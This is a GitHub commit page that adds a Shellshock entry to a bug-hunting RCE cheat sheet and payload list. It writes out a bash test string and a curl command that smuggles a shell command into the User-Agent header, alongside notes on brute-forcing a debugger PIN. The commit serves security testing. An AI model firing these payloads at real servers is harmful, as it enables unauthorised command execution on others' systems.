Skip to content

Commit

Permalink
Add Shellshock bug.
Browse files Browse the repository at this point in the history
  • Loading branch information
@EdOverflow
EdOverflow committed Jul 14, 2017
1 parent 20332b8 commit f1a044b
Show file tree
Hide file tree
Showing 2 changed files with 15 additions and 1 deletion.
12 changes: 11 additions & 1 deletion cheatsheets/rce.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,4 +8,14 @@ Find somewhere where user input can be supplied and submit the following string
strіng
```

If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.

**Shellshock Bug**

```bash
() { :;}; echo vulnerable
```

```zsh
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
```
4 changes: 4 additions & 0 deletions payloads.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -57,6 +57,10 @@ http://[::]

strіng

() { :;}; echo vulnerable

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/

/%09/google.com

/%5cgoogle.com
Expand Down

0 comments on commit f1a044b

Please sign in to comment.